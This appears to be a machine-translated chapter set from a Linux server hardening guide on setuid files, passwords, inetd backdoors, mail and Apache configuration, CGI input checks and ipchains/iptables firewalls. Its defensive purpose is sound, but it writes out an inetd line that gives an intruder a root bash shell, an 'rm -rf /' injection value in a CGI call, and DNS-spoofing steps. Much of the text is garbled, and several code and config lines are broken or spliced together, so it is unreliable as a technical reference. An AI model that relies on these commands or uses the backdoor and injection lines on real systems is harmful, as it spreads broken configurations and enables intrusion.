Chattr + we will use all setuserid program is set to not modifiable and set all system programs and directories can not be modified. In / bin, files in the directory / usr / bin, / sbin, / usr / sbin, / lib and so little change, so when they change, the administrator must know. If possible, for /, / boot, / usr, / var, / home use separate partition, set the system directory as read-only, and using a similar linux Intrusion Detection System (LIDS) and other security-enhanced tools to prevent intruders to re read - write mode plus
Load read-only partitions. Delete or remove useless setuserid program.
Hackers have been loaded on the file system program setuserid
Users load the drive with mount, equipment, documentation and remote file system, when the program is loaded with setuserid NFS program to present this can cause problems. To prevent setuserid loading files on the file system. Any remote file system or the local file system should be loaded with nosuid flag. You can also set noexec flag on the untrusted file system.
In order to prevent it from running on any program. If you want to run one of the programs can be copied to the local file system, and then run.
This not only helps to prevent privilege escalation types of attacks, but also to deal with setuserid perl script. And reduce the breeding program from worms and spread through the network.
Hard and symbolic links must be created for any temporary files that the program should use this function when you create the file exists to be repeated, for system calls
open (), you can use the O_EXCL parameters do.
open ( "/ tmp / filename", O_EXCL | O_CREAT | O_RDWR, 0666);
In perl, sysopen available in order to achieve:
sysopen (HANDLE, "/ tmp / filename", O_EXCL | O_CREAT | O_RDWR);
In shell scripts, use mktemp utility: tmpfile = `mktemp /tmp/filename.xxxxx`||exit 1
commands> $ tmpfile.
If you want a higher level of security necessary, you can install solar designer developed linux kernel patch located
http://www.openwall.org, the patch can be prevented to the / tmp directory symbolic links and hard links files under attack. Only users in the case of the actual file or have read and write access to be able to create links in / tmp. Application partitioning good habits, such as / home, / var, / tmp, / usr, / boot, / such zoning rules. Ensure that ordinary users other than / home and / tmp directory
All other partitions are no write permissions. This can prevent the build system files such as / etc / passwd and / bin / ls of the hard link.
Input validation
Script should always validate its input parameters, to ensure that it contains no illegal characters and shell meta characters. These parameters may cause unexpected interpretation can not include whitespace, shell meta characters and control characters. This rule applies to the shell script, also applies to those unwise use of system () function of a C program. Script should also shield modification of the IFS. Or before the implementation of the incoming parameters and check the correctness of the IFS is set to a safe value.
Chapter IX password cracking
DES (Data Encryption Standard Data Encryption Standard), linux in the crypt (3) implement des functions, it has two parameters
Number, key and salt, key is the user's password, salt is selected from the [a-zA-Z0-9./] in a string of length 2, the user password can not be longer than 8 characters. DES was developed with support of the US government's part, it is not outside of the United States
Area output.
MD5 algorithm is a hashing algorithm, DES improved in many ways, infinite password; larger key space than 13 characters long; output to the United States outside the region.
Password cracking program
crack, john the ripper, viper, slurpie
1, self-run password cracking programs, find the machine in the presence of weak passwords.
2. Ensure that the password file is not readable.
3, always check the log file.
4, using a shadow password.
Shadow password
/ Etc / shadow, is only readable by root. Format is as follows:
1, the user name;
2, password ciphertext;
3, password last modification date and the number of days separated by 1 January 1970; and
4, from the user password also allows you to modify the number of days remaining;
5, the user must change the password from the number of days still remaining;
6, away from the system to alert the user to modify the password must have the number of days remaining;
7, the user can modify the number of days remaining password, otherwise the account is disabled after the expiration.
8, reserved field.
Enable shadow passwords
pwck ---- Check / etc / passwd integrity
pwconv ---- converted to the shadow password. It creates / etc / shadow file based on the existing / etc / passwd file, if the file already exists in the system, it will be merged. In addition, after a successful conversion, may still add a normal unshaded account in / etc / passwd in. Therefore, the need to periodically check the contents of / etc / passwd to ensure that all passwords are hatching.
pwunconv ---- remove the shadow.
chage command, it is determined whether the user must change the password. Use the -M option to force the user to perform a specified period of time
After changing the password.
mindays password twice to change the minimum number of days between.
The maximum number of days maxdays valid password.
lastday password last modification date and the number of days separated by 1 January 1970 of.
Inactive after the password expires, the number of dormant days before the account is disabled.
Start Date expiredate account disabled.
warndays before the user must change the password Remind number of days the user.
Other utilities
gpasswd add a new user to the group.
groupadd Create a new group.
groupdel delete groups.
groupmod modify group information.
passwd to set a password.
useradd to create a new user.
userdel Delete user.
usermod modify user information.
Password protection
Create a strong password like planning, at least one character from each of these character sets: a-zA-Z0-9 punctuation. If des, use 6 - 8 characters, if you use md5, using characters of any length, longer than 15 better. Use different passwords on different systems, but it will be very difficult to remember, a solution is to use PGP and strong password to the file
passwd + program can force users to use strong passwords.
npasswd, anlpasswd are excellent password checker.
Use a valid password. OTP's SeureID, S / Key, OPIE
Summary password protection method:
1, to achieve a shadow password.
2, the use of md5 replace des.
3, the implementation of a good password policy, including testing when a user creates a new password, to force users to use strong passwords.
4, periodically run password cracking programs to find vulnerabilities in the system password.
5, consider using a password and a valid password deadline.
6, no way to tell people do not know the password.
Chapter passage way to keep hackers
Host-based authentication and user access
Modify hosts.allow and hosts.deny
There are number of network services using /etc/hosts.allow file to determine which clients are allowed to connect. If the service does not accept connections from that host, then after tcp handshake is complete will immediately close the connection without sending or receiving any data. That is, the service is able to attack from the host immune to such a connection, because hackers have no chance to send data in order to make damage. Within the space /etc/hosts.deny file normally should be "ALL: ALL", it does not represent all the hosts.allow
Machine listed will be rejected. Just delete the line (for example: cat / dev / null> /etc/host.deny), hackers can
Connection services provided.
Use file integrity tool to monitor the two files. Also take into consideration chattr + i command set them can not be changed.
Export unsafe nfs
Export "/" itself, without having to log hacker can modify all the files on the target host.
Remote shutdown command, will comment from the following line in /etc/inetd.conf:
shell stream tcp nowait root / usr / sbin / tcpd in.rshd
login stream tcp nowait root / usr / sbin / tcpd in.rlogind
exec stream tcp nowait root / usr / sbin / tcpd in.rexecd
After you install ssh, file integrity tools should be used to monitor all of the following documents:
/ Etc / sshd_config
/ Ect / ssh_known_hosts
Add root shell to inetd
A simple way to create a network of up to a root shell is to add a record in the /etc/inetd.conf file. Assuming no use ingreslock port in the invaded system, so black you can add the following line to /etc/inetd.conf
ingreslock stream tcp nowait root / bin / bash -i given -i parameter, / bin / bash will create an interactive shell. Thus, as long as connected to the system ingreslock ports, hackers can directly execute the command. Because this is not an actual tty (which is connected via a network socket). So it is not as good as the console easy task, but still be able to run any commands.
Run the file integrity checker. Configure the firewall are only allowed from the required port (ssh, smtp and http) connections.
Using chattr + i command. Even a better way that does not run inted. Most services provided by inted are not necessary.
Trojan programming hackers after obtaining the host controller, the use of programming, as the commonly used procedures such as ls, netstat, etc. modify recompiled, so as to control, hide and other purposes.
lrk - linux root kit provides a large number of Trojan programs such as du, find, ls, ifconfig like.
RKdet and CHKrootkit are two detection lrk tools.
Invasion kernel
Loadable kernel modules. Use the new module integrity check found time to install and modify existing modules to / lib / modules
Tree and licensing restrictions apply chattr + i command. Similar LIDS kernel patch and properly configured so that the installation files or loading the kernel module can not even root in / lib / modules.
If the kernel itself is compromised, big trouble in the new kernel is running, the administrator can not believe any of the information associated with the system. Including a list of files and processes, network links, disk, and CPU statistics, and / proc. We must immediately begin the system described in the second chapter of the recovery process.

Chapter XI server security
mail security
Mail User Agent (MUA) mail user agent, such as Mutt, Pine, Elm. Users of these programs to edit and read the message.
Mail Transfer Agent (MTA) mail transfer agents, such as sendmail, qmail, postfix. The main function in multiple machines
Forwarding messages between.
Mail Delivery Agent (MDA) mail delivery agent is the intermediary between the user interface and the MTA, it is removed from the MTA
E-mail back and placed in the local inbox or the outbox messages passed to MTA. This aspect of the program has mail.local
and Procmail.
The vast majority of issues related to security and the MTA.
It runs about 75% of the mail server on the Internet.
In 1988, Morris worm on the use of the internet it WIZ command, any user can use it to get root right now
limit. However, recently, it has become quite stable, which to a large extent be attributed to the establishment of Sendmail Inc. The business organization is now
Sendmail in charge of development work.
In order to ensure a secure e-mail and security issues must be taken absolutely vital that subscribe to the mail server of the selected column
Table and ready to upgrade when necessary.
The biggest problem is that it requires the mail server to bind to port 25, it must start to root. As long as the server found in drain
Hole, a hacker might gain root privileges immediately. Postfix and Qmail not run as root, they all use a single
A separate process is bound to port 25, the process to establish the connection immediately forwarded to the independent smtp program, which forever
Do not run as root. Both programs do not exist root class vulnerability. sendmail provides sendmail.cf file
RunASUSEr option, if this option is set, sendmail daemon reading and distribution of mail will first become designated
user. This also means that you must modify the file. Use the user has read access to them. These documents include queue entry
Recording / var / spool / mqueue, alias list, and: include: files. Since there is no default user and group, so to create
Build it. Sendmail mail to users and groups running sendmail, for example, you must include the following code in the .cf file:
O RunAsUser = sendmail: mail
Mail server flag
After the connection is established, smtp immediately send the flag to the user. This flag is usually including mail server name, smtp software name and
Version number, the current time, which is very important information for hackers, so you want to close this welcome message. In sendmail.cf
File, locate SmtpGreetingMessage, will be as follows:
O SmtpGreetingMessage = $ j Sendmail $ v / $ z; $ b
Modify O SmtpGreetingMessage = $ j BWare -SMTP spoken here; $ b
Then use the following command to reload its configuration file: killall -hup sendmail
qmail qmail-smtpd modify smtpgreeting value of; postfix modify smtpd_banner value.
SMTP VRFY command
VRFY machine was originally used to help determine the user name or e-mail address is legitimate, but now rarely used this command
Object. On the contrary, it is often used by hackers to the user to implement a brute force attack.
Usage: VRFY XXXX logs can record VRFY command operating conditions.
Close the command needs to sendmail.cf file for PrivacyOption make the following changes:
O PrivacyOption = authwarnings, novrfy or add the following line to the sendmail.mc configuration file, and then try
The newly compiled sendmail.cf. After define ( 'confPRIVACY_FLAGS', "authwarnings, novrfy") dnl, weight changes are complete
To upload a profile.
SMTP EXPN command
EXPN command extensions user name and e-mail address provided. And VRFY command is similar, it can also be used to guess the user name
And e-mail address.
To turn off EXPN request, just sendmail.cf will PrivacyOption flag amended as follows:
O PrivacyOption = authwarnings, noexpn, or add the following line to the sendmail.mc configuration file, and then try
The newly compiled sendmail.cf. define ( 'confPRIVACY_FLAGS', "authwarnings, noexpn") dnl, heavy http://www.linuxidc.com/ after editing
To upload a profile. If the same into the closed VRFY AND EXPN can write authwarnings, noexpn, novrfy. Such as
If you are using a recent version, you can also use goaway option, which automatically includes the noexpn, novrfy and other
PrivacyOption option.
qmail and postfix not support expn command, so there is no problem
Inappropriate file permissions
Upon reception and distribution of mail, the mail server may use multiple files, such as virtual hostnames, mail aliases and mail
Route map file, etc. If a user is able to modify these files, it can have an impact on the operation of the mail server.
Therefore, you must set the appropriate file permissions on the files using the file integrity tools closely monitoring the use of the mail server
All the files. At the same time, to be sure, you can also use the chattr + i command set these files can not be modified.
sendmail8.9 or later using .forwards,: include :, address mapping, and other relevant documents before its first execution
Check the correctness of the line license, if it considers that the permission given more than required, it will send back a message to cancel the operation. Such as
If you really want to rely on the transitional license, you must add the following line to the configuration information is displayed in the sendmail.mc
Tell sendmail with the appropriate permissions set unsafe.
OPTION ( 'confDONT_BLAME_SENDMAIL', 'groupwritablealiasfile') dnl
Warning: If you want to break the strict licensing provisions sendmail, it must be made sure that the meaning of things. Because once allowed
User to modify sendmail-related documents, they may get root privileges.
To further prevent run an external command can be configured to use sendmail smrsh (sendmail restricted shell) running
All shell commands, the following line was added to sendmail.mc:
FEATURE ( 'smrsh', 'path-to-smrsh'), smrsh program execution only in a specific directory (the default is /usr/adm/sm.bin)
program of. But to ensure the safety of the program directory.
qmail and postfix follow a principle: Only unrestricted root user can text related to the mail server
Members have write permission. The only exception is the .forward file. Once enabled, the owner must be received by users. mail
Server-related files in the / etc / postfix and / var / qmail. To ensure that these files are only writable root.
Mail relay
To protect the machines and networks are not selling spam abuse providers must ensure that they do not relay messages from unauthorized domain.
Sendmail8.9 and later versions default reject mail relay, if you have to relay messages from certain hosts,
You must add at their addresses / etc / mail / access file.
WARNING: sendmail seen as part of the entire domain name in the domain name after the hostname, if the administrator used in the .mc file
FEATURE {relay_entire_domain}, and the current local ip address any anti-analytic in a domain for a second-level domain
(Such as example.com), then its purpose is to allow relay messages to all machines in the domain, unfortunately, sendmail
It will be considered to be the domain .com, and thus is actually open relay run.
qmail0.91 later rejected and default mail relay, to set a specific host server to relay messages, you can
There are two ways:
1 to support host_options install tcp wrappers. smtpd daemon mode as shown below to run the qmail.
tcpd / var / qmail / bin / tcp-env / var / qmail / bin / qmail-smtpd
/etc/hosts.allow And add a line similar to the following for all need relay hosts.
tcp-env: xxx.xxx.xxx.xxx: setenv = RELAYCLIENT
2, if you use tcpserver0.80 or later, add the following line in the /etc/tcp.smtp:
xxx.xxx.xxx.xxx:allow,RELAYCLIENT= ""
Then run: tcprules /etc/tcp.smtp.cdb /etc/tcp.smtp.tmp `print decode_base64" listening to the password string ''
In order to monitor the hacker to reduce the possibility of user name and password, you should use secure http connection, SSL. The following example uses
stunnel connection ssl site is listening on port 443. Before sending data, the first to establish an encrypted connection, after the sending
It is sent encrypted.
machine $ stunnel -f -D7 -c -r www.example.com:443
Ssl version2 algorithms required by the US patent expiration of a September 20, 2000, you can use RESREF library.
Instead RSAREF library (security and stability).
TSL (transport layer security Transport Layer Security) protocol is based on SSLv3.0 by the internet engineering task
force (IEIF) D 1998 was proposed, the main purpose and the same ssl, provide secure transport layer. Target: password security,
Interoperability, scalability, relative efficiency. Ssl for improvement: a slight enhancement of security specification defines more clearly for
Future protocol provides a broader basis.
In the URL allows .. (double dot)
Early apache there is a huge security hole in the URL points to allow .. parent directory. Apache fill in a very early stage
On this loophole. But still affect CGI program.
It should not be run as root apache. So that the server can read files belonging to root, and executed by the CGI process
Sequence also have root privileges.
Dangerous symbolic links
If you allow the server to use symbolic links, there is a potential security threat. The web server access restrictions in the text file
Within the range of the tree is the most important file security policies. If there is a symbolic link, such as a user in its place a html directory
A point to / etc symbolic link link_to_etc, the hacker can request as / etc / passwd file:
http: // localhost / ~ hack / link_to_ect / passwd.
Allow symbolic link is as follows
Options FollowSymLinks
More stringent configuration is to allow only a symbolic link to a user belonging to the same file or directory
Options SymlinkIfOwnerMatch
If you want to use the link they should be placed in the focus that only authorized users can be written as root directory, with ordinary refuse
Users can create a symbolic link limit to limit the number of sensitive information is linked. Directory permissions to rwxr-xr - x, use Directory command
Limit apache to only use a symbolic link given directory.
Options FollowSymLinks
Prevent the acquisition of directory contents listing
The directive apache configuration directory service returns a list of the contents of Option Indexes. Option to remove all the instructions
Back instruction prevents the directory contents list.
The CGI is limited to certain directories, allow CGI to run a potential security issue in any directory, usually with APACHE
Set CGI program can only be executed in CGI directory. These directories are usually named cgi-bin or bin. These directories
All files are considered executable. And to run the web user (usually nobody) the identity of the operation. Should shut
NOTE contents of this directory, because the execution when they are requested.
ScriptAlias / cgi-bin / "/ usr / local / apache / cgi-bin"
Not based on the file name to enable CGI. The server can be based on a specific extension (.cgi, .pl, .php). This allows the program
Members will be placed in the server program directory structure, rather than a specific directory, this will cause potential safety problems. Text-based
Names to start CGI configuration commands are: AddHandler cgi-script .cgi. Do not use the command. Note that some lines
The default is to open the system functions, to check the system configuration, the option to comment or delete it.
Do not save multiple versions of a program under the CGI directory.
According to the file name to restrict access to files, you should use Files or FilesMatch instruction. If you use the Files, you should
Use the "~" sign to indicate quoted string as a regular expression. The following examples are given in order to deny access to all .bak
The end of the file settings:
Order allow, deny
Deny from all
When using FilesMatch, strings directly are considered regular expressions.
Unsafe CGI effects on other web sites. If the server with the same user (usually nobody) run empty
Intends to host, the CGI program on a virtual host vulnerability could compromise all the virtual hosts. So to use
SuEXEC configure each virtual machine to different users run CGI programs.
Safely use .htaccess file to configure http authentication
Configure the server to allow the use of .htaccess file is a convenient method of authentication, this time, just in need of identity
By placing a certified directory called .htaccess file, you can control access. To configure the server to start
With a .htaccess file, you can use the AllowOverride and AccessFileName.
Here is an example of the configuration of HTTP authentication, the following instructions are written httpd.conf, to enable .htaccess file.
.htaccess AllowOverride directive is set to replace the item (for authentication should be set AuthConfig).
AllowOverride AuthConfig
As specified by the control file called .htaccess file access, use instruction AccessFileName
AccessFileName .htaccess
Applying .htaccess file itself should never be provided to the client server, you must use Files command to match
Set server to browser to refuse access to the .htaccess.
Order allow, deny
Deny from all
.htaccess file content tells the server password file location and other information, such as:
require user login jdoe
AuthUserFile directive point that contains the user name and password combination file, the file created with htpasswd. This document must
You can not be placed in the document tree directory.
Safely use httpd.conf file to configure authentication. This approach would be more secure, it does not need to create and manage
Li .htaccess file. Configuration examples are as follows:
AuthType Basic
AuthName "my private directory"
AuthUserFile /usr/local/apache/misc/my_private_dir.htpasswd
require valid-user
Use the default configuration vulnerabilities, install the system, there is a default configuration, the default configuration may be unsafe,
It advised to turn off all the useless default configuration.
1. Delete the online manual
2, delete the default welcome page
3, delete the file name based on the implementation of CGI programs.
4, security configuration parsed HTML files, also known as SSIs (Server Side Includes), is the need for pretreatment HTML
File that allows the server to generate HTML by including other files or execute external commands, configuration instructions are:
AddType text / html .shtml
AddHandler server-parsed .shtml
AddHandler server-parsed .html
SSIs allow a user (users including some low capacity) capable of executing a program uploaded HTML file. So only
When necessary configuration. Otherwise, turn it off.
Server security configuration and status information display
SetHandler server-status
Order deny, allow
Deny from all
Allow from localhost
SetHandler server-info
Order deny, allow
Deny from all
Allow from .example.com
Should only trusted hosts to display this information, it should ensure that those included in the command Deny from all. And Allow
listed from trusted hosts. But a better approach is to close it.
Configuration public_html directory
Properly configured apache and the like can be http://www.example.com/~jdoe/ URL points to ~ jdoe / public_html
Or the corresponding file:
UserDir public_html
If you do not need this feature, the comment or delete it. More secure approach is to require the user to place the HTML file, create a directory in the web document tree. And to this directory is set to the appropriate users or groups to be able to write.
If you need WEB agent, remove or comment out the following instructions
Order deny, allow
Deny from all
Allow from .example.com
CGI procedures
Do not trust pre-installed and downloadable CGI, should follow three simple rules:
1. Remove the included web server CGI program;
2, delete those that are not prepared or do not have their own completely overhauled and CGI programs;
3, do not from the popular script library (free or pay) to download and use the script should write their own.
Most insecure CGI programs grouped into the following categories:
1, do not assume correctly.
2, execute operating system programs and find open even to the operating system of pipes.
Should write CGI
1, always check the received field.
2, to use MD5 checksum hidden field. Using hidden fields are naive approach to pass data between the CGI, a more sophisticated approach is to create a cookie to save a random session ID, and the server session related data will be saved to the database, with the session ID as the primary key of the corresponding database.
3, always check the length of the data.
4. Do not rely on the referer header information.
5. Do not rely on cookie. The cookie used in conjunction with ssl.
6 to explicitly open the file in read mode. Check the file name characters. If the character exists outside of the permissible range, do not send the file name passed to open ().
7. Never assume pretreatment will be executed. CGI programs must not assume that the data received must be in the correct format.
You must check the data format and modify it if necessary CGI program.
9. Never believe the parameters from the form of the use of system calls or pipe. You should verify variable contains only valid characters.
10, rather than checking if it contains illegal characters. This ensures that $ file file name correctly. That includes only
11, letters, numbers, underscores each dot.
if ($ file = ~ /^[\w\.]+$/)) {all is well} else {all is not well}
9, a sequence mode execution system (). Such as: system ( "wc -c $ file"), if the $ file is a.dat; rm -rf / on serious issues.
Become wc -c a.dat; rm -rf /. Can be written as system 'wc', '- c', $ file. If you want to quote the anti-pipeline mode or manner corresponding results in the internal procedures, the use of fork () and exec ().
Such as: $ num_chars = `wc -c $ file '; security is implemented as: if (open PIPE,' - | ') {$ num_chars =
;} Else
{Exec 'wc', '- c', $ file;}. If you use the pipeline to achieve the following: open P, "wc -c $ file |"; print
; To achieve safe
Is: if (open PIPE, '- |') {print
} Else {exec 'wc', '- c', $ file;}
Use WEB farm, now the web server based on large-scale ISP server scenario is very common, so your site may at the same time and hundreds of thousands of sites along with "grazing" on "WEB farm. If one site loopholes , then they may be attacked, and hackers to gain root privileges. then you are not immune, so choose wisely ISP. best self station.
Other web servers Jigsaw (www.w3.org/Jigsaw) was developed by the w3c, with java achieve, it is designed to be more focused on technology demonstration, the demonstration will be popular features and technology, it is not recommended.
thttpd is a simple, small, portable, fast and secure HTTP server. Its built-in adjustment function allows the user to specify a URL OR URL GROUP maximum byte traffic.
AOL server. Tcl-based multi-threaded server. Suitable for large-scale dynamic sites. By a large commercial company to develop, but to follow GPL.
bash-httpd. It is a web server written in bash. But it does not function most other web servers running slow and unsafe, not suitable for the working environment.
awk-httpd. AWK to write a web server to use. Slow, unsafe, and only implements a subset of the http. Not suitable for the working environment.

Using the following measures can help administrators secure web site.
1. Select a secure server, ensure that whenever a security vulnerability when they can quickly upgrade (apache full well
2, foot this requirement). The requirements for other components on the basis of the software to add, such as mod_perl, mod_php4.
3, correctly configure the server to refuse to list the contents of a directory, only perform a specific directory CGI program, and prohibit the use of
4, ".." (pointing to the parent directory).
3, not to use the INTERNET at the CGI program, and to avoid making any assumptions in the preparation of such programs.
4, unless the sequence mode Do not call system () or exec () function. Do not open the pipeline.
5, regularly check the server's log files.
Chapter XIII access control and firewall
As long as your linux system connected to the Internet and provide certain services, the implementation of host access control and firewall
Linux is the first step to achieve security.
Many network services by inetd (Internet Daemon) start. It can monitor the system more specified ports if
On a port to establish a connection, then start the appropriate service. For example, suppose port 23 to establish a connection,
inetd will start the telnet daemon to process the request. Similarly, if a user is connected to the machine ftp port 21, inetd
It will start ftpd process. inetd find the port request for a connection in the file / etc / services in. Use inetd, the system
Just continue to run a daemon program on it, instead of eight or ten. When you start inetd, it reads the configuration file
/etc/inetd.conf to determine their own control services.
telnet stream tcp nowait root / usr / sbin / telnetd
pop-3 stream tcp nowait root / usr / sbin / pop3d
The fields represent:
1, the name of the service (specified in the / etc / services in)
2, the socket type stream / dgram
3, the protocol tcp / udp
4, nowait specified inetd creates a new process for the new connection
5, the process will be what the user (root) to run
6, the position of the program
Inetd is extended or enhanced version. It implements a number of inetd but no valuable features, including:
1, built on the remote host address, or domain name of the access control functions, similar to tcp wrappers.
2, access control based on the time period.
3, complete recording connection log, including the success or failure of the connection.
5, by limiting the total number of concurrent processes running similar service number, service process, the log file size, received the same host
6, number of connections, etc., to prevent DoS.
5, the service can be bound to a specific network interface (for example, only the internal interface bound without binding external interface).
Configuration and inetd completely different, can be converted from perl program xconv.pl inetd.conf file xinetd.conf
$ / Usr / local / sbin / xconv.pl /etc/xinetd.conf
Configuration File Format
instances = 25
log_type = FILE / var / log / servicelog
log_on_seccess = HOST PID
log_on_failure = HOST RECORD
per_sourece = 5
service ftp
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/in.ftpd
server_args = -l -a
defaults section describes the fields as follows:
Maximum number of requests processed concurrently server instances
log_type log in the specified file, but also allows the use of syslog xinetd
log_on_success selection of successful connections to record information, including PID, HOST AND USERID
log_on_failure of failed connection you want to record information, including PID, HOST AND USERID
per_source same ip address to establish the upper limit of the number of connections for the same service.
includedir /etc/xinetd.d script in this directory can also be xinetd start.
The inetd xinetd is converted to the final step is to modify the corresponding scripts under /etc/rc.d, the system will be configured to start xinetd
When running.
Use inetd and tcpd hosts access control implementation
tcpd able to service external "package" is defined in the request rule in /etc/hosts.allow and /etc/hosts.deny. Here is
An installation of the tcpd inetd.conf configuration file.
ftp stream tcp nowait root / usr / sbin / tcpd in.ftpd -l -a
telnet stream tcp nowait root / usr / sbin / tcpd in.telnetd
pop-3 stream tcp nowait root / usr / sbin / tcpd ipop3d
Here with tcpd encapsulates in.ftpd, in.telnetd, ipop3d, when attempting to connect to these services, tcpd verifies the corresponding compliance
/etc/hosts.allow and /etc/hosts.deny rules format:
daemon_list: client_list [: shell_command]
in.telnetd: trusted.machine.example.com .example.com
Complete the following matching rules
1, if the item with a leading dot, it matches all clients within the domain. As .example.com matches
2, xxx.example.com, xxx.xxx.example.com like.
2, If the item ends with a dot, it matches all prefixes same client. Such as 192.168. As with all similar
Match the machine 192.168.xxx.xxx.
3. If the entry to "@" the beginning, it was recognized as nis network group name. Such as sshd: @trustedhosts will allow trustedhosts
Network group machine access ssh.
4. If the entry format xxx.xxx.xxx.xxx/yyy.yyy.yyy.yyy, was regarded as a network mask pair. Such as will match all ip in range machines.
Wildcard Description:
ALL Match all clients.
LOCAL matches any machine that does not contain the point number.
UNKNOWN matches any name or address is unknown client (must be used with care).
KNOWN Matches any names or addresses of known clients (must be used with care, may be because the server name
Cause temporary unavailable host name).
PARANOID matches any name or address does not match the client.
Therefore, in order to resist the attack telnet, can be written in /etc/host.deny rules all: all, to deny hackers telnet connection. Such as
If allowed to use telnet to connect to a machine, which can be added to the /etc/hosts.allow file: telnetd: xxx.example.com.
Use xinetd host access control implementation
xinetd One of the most important enhancements inetd is a built access control capabilities, eliminating the need for tcp wrappers. It services
Access control to implement the following:
1, similar to tcp wrappers control. Control ip address based on ip name control, domain-based control.
2, the access time (for example, ftp access restrictions between 8:00 to 17:00)
All Access uses xinetd reject all machines can be set in the defaults section xinetd.conf no_access = Another method is to use the property only_from =, do not give it a value, this approach is better, because then we can be added thereafter to allow the host connection.
You can specify for each service to allow ip connection. You must use "+ =" operator to only_from added.
You can restrict access time access_times property, such as access_times = 8: 00-17: 00
Fake "credible" anti resolve DNS address
hacker $ host hacker.example.com
hacker.example.com has address
hacker $ host domain name pointer trusted.target_network.com
In order to enter the hacker target_network.com, will his anti resolve DNS address settings as belonging to a trusted domain.
If the software is simple precautions, this attack would not succeed: simultaneous forward and reverse DNS queries before.
When compiling tcp wrappers if elected -DPARANOID option, it will cut off all the forward and reverse DNS resolution is inconsistent
An attacker from a trusted domain
Specify the host field in the inetd locked in. It can be used in the EXCEPT operation HOSTS.ALLOW file.
ALL: .example.com EXCEPT trouble.example.com
Another method is to remove it to its DNS records so that the machine can not be mapped to any domain name.
Lock the specified host in the domain of xinetd. You can use no_access.
Some do not support the inetd / xinetd startup and procedures, such as SSH, if you want to support TCP wrappers can be specified at compile time
--with-tcp-wrappers option. If the package itself does not support this feature, please add maintainer program (usually unsuccessful),
Or the development of their own to achieve this functionality.
Attack vulnerable tcp wrappers rules
After you install the package and set the rules, you may find that the package does not work, this is usually the configuration file
Error. Available TCPDCHK AND TCPDMATCH inspection rules.
For resource depletion started by inetd service attack
Hackers can be protected by tcp wrappers service initiation thousands of connections to the system to launch resource exhaustion attack. Caused no
You can respond to legitimate connection. If you do not use xinetd, you can even use tcpserver to limit the number of connections to the service.
This program also allows the administrator to configure host access control. Its function the same TCP wrappers. Use xinetd can be prevented
Yu such attacks, it built-in features help to deal with this problem. 1, limiting the number of concurrent connections for each service (instances);
2, limit each IP address even number (per_source) to a single service connection.
Host access through the firewall than tcp wrappers or xinetd achieve control more secure. This is because the firewall barrier
Hackers only reach port protected machine, and the package is for the system has reached the connection request to take security measures.
There are two types of firewalls
1, application proxy server. Resolve the specified protocol and establishes a connection request. Typically include content filtering (for example:
2, blocking javascript)
3, packet filtering firewall. Source and destination addresses to selectively accept or reject packets based on, it often does not parse the appropriate protocol,
4, it does not perform content inspection.
Many firewalls, particularly commercial version, usually integrate these two types. They are often referred to as stateful packet filter.
Because they maintain some similar session state to support the FTP protocol, but also for fast packet-based transition process.
linux packet filtering functions are integrated in the kernel, version 2.2 is ipchains, version 2.4 is the iptables. Check the data packet filtering
Head packet and determine the action to be taken:
Receiving data packets, which allows through.
Rejected (reject) packet, discard it and tell the source address of the packet is rejected.
Reject (deny) data fierce, direct throw it away, if not received the packet.
The most effective strategy is to deny packets, so that you can reject a potential hacker to access and does not give any response --- he will not
I know that the connection has been rejected, and the connection is also suspended until the timeout (which significantly delayed the port scanning speed).
linux2.4 completely rewritten kernel packet filtering code to make it more powerful. The corresponding system is called Netfilter. Control of its rules
Assembly is iptables, iptables is similar to ipchains, the difference between the two are:
1, built-in chain name is now uppercase (ie, INPUT, OUTPUT, FORWARD, etc.).
3, TCP AND UDP ports now need to specify the --source-port or --sport and --distination-port or dport options
4, and must be placed after the -p tcp or -p udp.
3, -y flag is now changed -syn, and must be placed after the -p tcp.
4, DENY substituted DROP.
5, MASQ was changed MASQUERQDE, and use a different syntax.
6, support is no longer required to check the status of the kernel module.
Status Check
Introducing the concept of status check is one of the most important work done by iptables. Firewall only checks the source state detection,
Destination IP address and port, also monitors the protocol used to ensure that the communications follow the appropriate connection rules. If HTTP
Connection, it can be sent to the remote host to ensure that GET, POST OR HEAD request meets the HTTP protocol, after which it
Ensure that the response of the remote host information including HTTP header and data body. Note that a very experienced hacker if control
Communication between the parties, will only need to modify their agreement, to make it look like HTTP which can pass through the firewall.
Blocking access to specific network
Reject ICMP ping and traceroute
ipchains implementation
/ Sbin / ipchains -A input -s 0/0 echo-request -d -p icmp -j DENY
-A Input add the rule to the rule set input
-s 0/0 from any ip address
echo-request -d x.x.x.x to the destination address of the echo-request type
-p icmp protocol
-j DENY immediately rejected
To deal with traceroute, should reject all to port 33435 --- 33525 packages.
/ Sbin / ipchains -A input -s 0/0 -d -p udp 33435: 33525 -j DENY
Realization of iptables
/ Sbin / iptables -A INPUT -s 0/0 -d -p icmp --icmp-type echo-request -j DROP
/ Sbin / iptables -A INPUT -s 0/0 -d -p udp --dport 33435: 33525 -j DROP
telnet port connection attempts
ipchains implementation
/ Sbin / ipchains -A input -i eth0 -s 0/0 -d telnet -p tcp -j DENY (only if other services
Need to replace telnet on it)
Firewall Policy
When you create a firewall on your system, we recommend that you follow a simple rule, reject all things are not explicitly permitted.
In other words is the name, you should determine which packets to allow through and create a rule, all other packets should be rejected. This is the most secure
The whole approach. One way to achieve this is to start the firewall policy and rejects all packets, all the data is rejected
Package to a log file, and then check the log file, note that the package is rejected, and if found should be allowed a certain
Packet by adding rules at the beginning of the rule set to allow the packet through, and then continue the process. until
The system allows all the services can be accessed through the internet.
If you allow all packets flowing into a port (eg: SSH), still it should be used to deny tcp wrappers from
Connection outside hosts.allow middle finger host. This can achieve the effect of double protection, firewall configuration errors are still denier
Another line of defense.
Create a firewall using ipchains (order of the rules is essential. Should be the default rule allowing the inflow reject all)
/ Sbin / ipchains -P input DENY processing incoming packets of the default rule is DENY
/ Sbin / ipchains -A input -s 0/0 -d www -p tcp -j ACCEPT
/ Sbin / ipchains -A input -s 0/0 -d ssh -p tcp -j ACCEPT
/ Sbin / ipchains -A input -j DENY -l reject all incoming packets and record them (using the -l option)
iptables implementation, should follow the same strategy with ipchains
/ Sbin / iptables -P INPUT DROP
/ Sbin / iptables -A INPUT -s 0/0 -d -p tcp --dport www -j ACCEPT
/ Sbin / iptables -A INPUT -s 0/0 -d -p tcp --dport ssh -j ACCEPT
/ Sbin / iptables -A INPUT -j DROP
/ Sbin / iptables -A UNPUT -j LOG recording all reject incoming packets.
Firewall Configuration Tool
MonMatha of IPTables
Open source firewall
FWTK application proxy firewall
SINUS a run on smaller systems and linux kernel 2.0 firewall.
